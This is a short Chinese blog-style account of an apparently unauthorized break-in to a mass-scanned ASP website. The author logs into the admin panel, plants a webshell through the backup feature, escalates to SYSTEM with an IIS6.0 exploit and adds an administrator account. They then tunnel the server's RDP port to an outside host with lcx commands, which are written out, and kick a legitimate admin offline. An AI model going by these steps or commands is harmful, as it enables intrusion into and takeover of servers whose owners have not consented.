記一次滲透提權03伺服器
站點是批量測注入的時候發現的,隨手測了下後臺就是admin,登陸進去發現有兩處應該可以拿shell
備份檔案
備份功能穩不穩定不知道,怕把站點搞死,最後還是通過備份成功getshell的 XD
圖片上傳
測試了修改檔案型別,00截斷,.asa、.cer….等無效,而且上傳的檔名自動轉換時間戳重新命名,遂放棄。
不過有意思的是,右鍵原始碼把編輯器揪出來了,開發把編輯器隱藏顯示了,如下圖(display:none改成on後即可顯示,然鵝沒有卵用,並不正常顯示)
知道是eWebEditor的編輯器,編輯器後臺地址:http:127.0.0.1/pluck%60edit/admin/login.asp,嘗試了爆破,弱口令,預設備份mdb下載均無果也放棄了。(後來進去翻到賬號就是建站公司的英文名字,密碼加了個三位數,資訊蒐集對於爆破這一塊還挺重要的)
提權
許可權提升
進去大馬(站點僅支援asp),可以直接執行cmd,就是許可權很低
systeminfo直接看打了什麼補丁,拿exp先懟懟看,複製下來補丁資訊,扔進去 提權輔助 這個網頁裡比較下,可以使用 IIS6.0 的一個 exp,傳到可讀寫目錄裡,我這裡就是 C:\wmpub ,然後就用 IIS6.0.exe 執行命令,發現是system許可權了,同樣的方法新增一個管理員帳號。
遠端連線
由於主機在內網,開放的就是3389埠,我們只需要將主機的3389埠轉發出來,就可以連線上去
埠轉發工具:lcx (具體使用方法移步: 傳送門 )
公網主機:
lcx -listen 2222 6666
肉雞:
lcx.exe -slave 公網主機ip 2222 127.0.0.1 3389
然後公網主機連線127.0.0.1:6666,發現連線失敗,我丟。。。。(quser查詢有一個前幾天線上的管理,logoff踢掉了,然鵝還是上不去)
就到這裡吧。